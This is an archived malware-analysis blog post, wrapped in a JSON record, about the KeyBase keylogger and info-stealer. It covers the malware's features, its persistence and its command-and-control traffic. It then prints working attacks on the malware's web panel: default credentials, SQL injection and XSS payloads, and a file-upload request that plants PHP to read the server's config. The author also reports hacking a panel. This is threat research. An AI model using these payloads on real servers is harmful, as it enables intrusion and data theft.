{
	"id": "a9133bf6-0019-45d2-b64c-f3621c987489",
	"created_at": "2026-04-06T01:32:31.273047Z",
	"updated_at": "2026-04-10T03:21:58.507124Z",
	"deleted_at": null,
	"sha1_hash": "157f0d8d55f4207d98eff37c814325070fb8a4a3",
	"title": "Keybase",
	"llm_title": "",
	"authors": "",
	"file_creation_date": "0001-01-01T00:00:00Z",
	"file_modification_date": "0001-01-01T00:00:00Z",
	"file_size": 1612527,
	"plain_text": "Keybase\r\nBy voidsec\r\nPublished: 2016-01-28 · Archived: 2026-04-06 00:15:41 UTC\r\nReading Time: 6 minutes\r\nRecently, a malware known as KeyBase, is “triggering” some of my sensors. KeyBase was distributed in\r\nFebruary 2015 and sold for about $ 50 (in its first version), It remained active until May and then disappear from\r\ninternet. During November it is back up with thousands of infections (v1.5).\r\nKeybase is a malware with limited capabilities belonging to the families of keyloggers and info-stealers.\r\nMalware Overview\r\nKeybase is written in C# and among its features we can find:\r\nKeylogging\r\nHotLogging(Keylogging ofspecific windows.ex. Paypal, bank accountsetc.)\r\nPassword Stealer\r\nBrowsers (Chrome, FIrefox, Internet Explorer, Opera, Safari)\r\nClient Email (Outlook, Thunderbird, Incredimail, NetScape, Eudora)\r\nGeneral Purpose Software (FileZilla, JDownloader, IDM, Imvu, PalTalk)\r\nTaking Screenshot of the entire screen or specific windows\r\nSteal the contents of the Clipboard\r\nAbility to block certain Web sites\r\nVisit a website during the malware startup\r\nSelf-destruction upon reaching a specific date\r\nhttps://voidsec.com/keybase-en/\r\nPage 1 of 9\n\nCode Analysis\r\nCode is not particularly difficult to read as it is not obfuscated, it also contains the command and control server\r\ninformation “hard–coded” into the source code.\r\nYou can locate a key within resources of the program, once compiled, that appears unique to each build\r\nperformed on the same machine.\r\nhttps://voidsec.com/keybase-en/\r\nPage 2 of 9\n\nThe author has taken a number of simple obfuscation techniques to strings used in the code.\r\nMainly\r\n“replace” and “reverse” operations to characters and strings, in addition to these operations, all the Microsoft\r\nWindows API calls are encrypted.\r\nMalware persistence is obtained by copying the executable in the Startup folder under the name of Important.exe\r\n(visible in the first block of code). This information cannot be changed by the builder and is statically set in the\r\nsource code. It also set a key value in the registry as follow:\r\nHKCU\\Software\\Microsoft\\Windows\\CurrentVersion\\Run {32 byte}:{exe path}\r\nCommand and Control \u0026 Web Panel\r\nThe most interesting thing, especially for the poor quality of the code, is the web interface.\r\nAll the communications with the remote server are performed via simple HTTP requests and they are not\r\nencrypted.\r\nhttps://voidsec.com/keybase-en/\r\nPage 3 of 9\n\nKeyBase notification is issued to the remote server once it has been installed:\r\nNote\r\nthe absence of certain HTTP headers.\r\nThe Web Control Panel gives you the control on all the information stolen from infected machines as seen in the\r\nfollowing image:\r\nExploit\r\nDefault credentials for the web panels are: Admin:Admin, KeyBase:Logs123!\r\nhttps://voidsec.com/keybase-en/\r\nPage 4 of 9\n\nAnalyzing the source code of the Web panel, you can identify multiple vulnerabilities:\r\nPost.php is vulnerable to SQL Injection (Error \u0026 Blind Based) and Cross Site Scripting (XSS) because the\r\n“machinename, windowtitle, keystrokestyped, machinetime” parameters are not filtered in any way.\r\nSqlmap:\r\nParameter: machinename (GET)\r\nType: error-based\r\nTitle: MySQL \u003e= 5.0 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause\r\nPayload: machinename=1' AND (SELECT 5650 FROM(SELECT COUNT(*),CONCAT(0x71706b6a71,(SELECT (ELT(5650=5\r\nType: AND/OR time-based blind\r\nTitle: MySQL \u003e= 5.0.12 AND time-based blind (SELECT)\r\nPayload: machinename=1' AND (SELECT * FROM (SELECT(SLEEP(5)))GRmL) AND 'mEfO'='mEfO\u0026windowtitle=a\u0026key\r\nXSS:\r\nhttps://voidsec.com/keybase-en/\r\nPage 5 of 9\n\nGET /keybase/post.php?keystrokestyped=a'\"\u003cscript\u003ealert('VoidSec')\u003c/script\u003e\u0026machinename=1\u0026machinetime=\r\nThe session cookie is set without the ‘HTTPOnly’ flag allowing the session hijacking through the previous XSS\r\nvulnerability.\r\nBy default, the directory “/image/Images“, (destination of the screenshots) does not require authentication,\r\nallowing anyone to see the images stored on the server\r\nUpload.php does not perform any validation on the uploaded file, allowing a third party to upload a PHP script\r\nwhich can compromise the entire C\u0026C server.\r\nYou may also notice how the author forgot the ‘re-naming’ of the uploaded files, the function designed for this\r\npurpose is never used.\r\nBy\r\nsubmitting this request, you can upload a PHP file that allows you to read username and password of the web\r\ninterface.\r\nExploit:\r\nPOST /image/upload.php HTTP/1.1\r\nHost: $$VULNERABLE_HOST$$\r\nUser-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; rv:43.0) Gecko/20100101 Firefox/43.0\r\nAccept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8\r\nAccept-Language: en-US,en;q=0.5\r\nAccept-Encoding: gzip, deflate\r\nDNT: 1\r\nConnection: close\r\nContent-Type: multipart/form-data; boundary=---------------------------34593197730004\r\nContent-Length: 394\r\n-----------------------------34593197730004\r\nContent-Disposition: form-data; name=\"file\"; filename=\"NUBO_12_21_16_48_4.jpg.php\"\r\nContent-Type: application/octet-stream\r\n\u003c.?php $file = '../../config.php'; echo file_get_contents($file); ?.\u003e\r\n-----------------------------34593197730004\r\nContent-Disposition: form-data; name=\"submit\"\r\nhttps://voidsec.com/keybase-en/\r\nPage 6 of 9\n\nUpload\r\n-----------------------------34593197730004--\r\nMalware Distribution \u0026 Targets\r\nKeyBase, seems to be used to infect devices in over 41 countries, namely: Bosnia and Herzegovina, India, Iran,\r\nJordan, Philippines, Serbia, Thailand, United States of America, Viet Nam.\r\nIts incidence becomes relevant when we talk about the Iran that owns 45% of the infected devices..\r\nSome installations include machines used in the following sectors: industrial, high tech, private medical offices,\r\nhigher education, retail industries, government agencies as well as to traditional computer households.\r\nhttps://voidsec.com/keybase-en/\r\nPage 7 of 9\n\nAmong the bulk of the collected information, while hacking one of the web panels, I was able to discover some\r\nfiles regarding the creation of a new Ransomware. I “dumped” all the back-end source code and I am currently\r\nmonitoring the server, trying to retrieve some samples or the executable source code.\r\nBut that’s another story ….\r\nConclusions\r\nFinally, despite KeyBase, lacks a few options (Download \u0026 Execute, Update) in the current landscape of malware\r\nand it appears unsophisticated (lack of encrypted communication and obfuscation) its ease of use, low detection\r\nrate and its simplicity by design, makes it useful for further development and/or further steps in a crypter,\r\nallowing the evasion of the most common Anti-Virus products.\r\nhttps://voidsec.com/keybase-en/\r\nPage 8 of 9\n\nSource: https://voidsec.com/keybase-en/\r\nhttps://voidsec.com/keybase-en/\r\nPage 9 of 9",
	"extraction_quality": 1,
	"language": "EN",
	"sources": [
		"Malpedia"
	],
	"references": [
		"https://voidsec.com/keybase-en/"
	],
	"report_names": [
		"keybase-en"
	],
	"threat_actors": [],
	"ts_created_at": 1775439151,
	"ts_updated_at": 1775791318,
	"ts_creation_date": 0,
	"ts_modification_date": 0,
	"files": {
		"pdf": "https://archive.orkl.eu/157f0d8d55f4207d98eff37c814325070fb8a4a3.pdf",
		"text": "https://archive.orkl.eu/157f0d8d55f4207d98eff37c814325070fb8a4a3.txt",
		"img": "https://archive.orkl.eu/157f0d8d55f4207d98eff37c814325070fb8a4a3.jpg"
	}
}